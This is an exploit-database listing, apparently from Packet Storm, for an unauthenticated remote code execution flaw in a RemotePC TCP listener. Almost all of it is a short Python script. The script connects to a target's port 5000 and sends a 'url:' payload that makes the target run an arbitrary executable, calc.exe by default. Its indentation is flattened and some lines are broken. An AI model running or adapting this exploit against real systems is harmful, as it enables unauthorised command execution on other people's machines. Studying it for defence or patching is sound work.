Share
## https://sploitus.com/exploit?id=PACKETSTORM:190462
# Exploit Title: RemotePC - Unauthenticated RCE
# Date: 2025-04-14
# Exploit Author: Ahmet รmit BAYRAM
# Vendor: https://github.com/akoc95/RemotePC
# Version: latest
# Tested on: Windows 10 - 64bit
# CVE: N/A
#!/usr/bin/env python3
import socket
import argparse
def exploit_rce(host, port, target_path):
print(f"[+] Connecting to {host}:{port}")
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
payload = f"url:{target_path}"
s.sendall(payload.encode())
print(f"[+] Payload sent: {payload}")
print("[+] Exploit triggered. If vulnerable, command is executed.")
except Exception as e:
print(f"[!] Connection failed: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="RemotePC TCPListener
Unauthenticated RCE Exploit")
parser.add_argument("--host", required=True, help="Target IP address")
parser.add_argument("--port", type=int, default=5000, help="Target port
(default: 5000)")
parser.add_argument("--path", default="C:\\Windows\\System32\\calc.exe",
help="Executable path to run on target")
args = parser.parse_args()
exploit_rce(args.host, args.port, args.path)